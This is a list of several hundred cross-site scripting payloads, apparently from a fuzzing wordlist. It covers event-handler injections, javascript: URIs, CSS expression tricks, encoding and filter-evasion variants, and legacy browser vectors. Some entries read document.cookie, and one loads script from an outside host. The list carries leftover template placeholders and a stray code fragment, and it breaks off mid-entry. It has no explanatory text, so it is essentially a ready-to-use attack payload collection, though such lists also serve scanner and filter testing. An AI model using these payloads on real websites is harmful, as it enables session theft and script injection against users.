onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> +<script>/* *\x00/javascript:alert(1)// */</script> +<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> +"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +"><img src=x onerror=javascript:alert(1)> +"><img src=x onerror=javascript:alert('1')> +"><img src=x onerror=javascript:alert("1")> +"><img src=x onerror=javascript:alert(`1`)> +"><img src=x onerror=javascript:alert(('1'))> +"><img src=x onerror=javascript:alert(("1"))> +"><img src=x onerror=javascript:alert((`1`))> +"><img src=x onerror=javascript:alert(A)> +"><img src=x onerror=javascript:alert((A))> +"><img src=x onerror=javascript:alert(('A'))> +"><img src=x onerror=javascript:alert('A')> +"><img src=x onerror=javascript:alert(("A"))> +"><img src=x onerror=javascript:alert("A")> +"><img src=x onerror=javascript:alert((`A`))> +"><img src=x onerror=javascript:alert(`A`)> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input onfocus=javascript:alert(1) autofocus> +<input onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> +<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> +<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +<object onerror=javascript:javascript:alert(1)> +<embed type="image" src=%(scriptlet)s></embed> +<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> +<IMG SRC=&{javascript:alert(1);};> +<a href="jav&#65ascript:javascript:alert(1)">test1</a> +<a href="jav&#97ascript:javascript:alert(1)">test1</a> +<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> +<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>"> +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; +alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- +></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert("XSS")> +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> +<a onmouseover="alert(document.cookie)">xxs link</a> +<a onmouseover=alert(document.cookie)>xxs link</a> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=# onmouseover="alert('xxs')"> +<IMG SRC= onmouseover="alert('xxs')"> +<IMG onmouseover="alert('xxs')"> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG 